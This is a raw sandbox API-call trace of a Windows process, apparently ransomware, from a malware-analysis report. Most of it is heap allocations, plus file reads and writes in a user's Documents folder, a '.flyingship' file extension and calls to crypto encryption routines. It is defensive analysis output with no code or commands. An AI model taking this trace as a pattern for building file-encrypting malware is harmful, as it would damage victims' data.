(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.501] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0172.501] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0172.501] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0172.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0172.503] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0172.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0172.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\mo9b rc5.flyingship.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0172.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0172.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0172.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0172.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0172.507] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0172.507] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x8295, lpOverlapped=0x0) returned 1 [0172.510] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0172.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8295) returned 0xa7f018 [0172.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0172.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8295) returned 0xa872b8 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8295) returned 0xa7f018 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0172.513] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.513] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0172.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8295) returned 0xa7f018 [0172.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0172.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8295) returned 0xa8f558 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.514] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0172.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0172.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0172.515] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0172.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.516] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0172.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0172.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0172.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 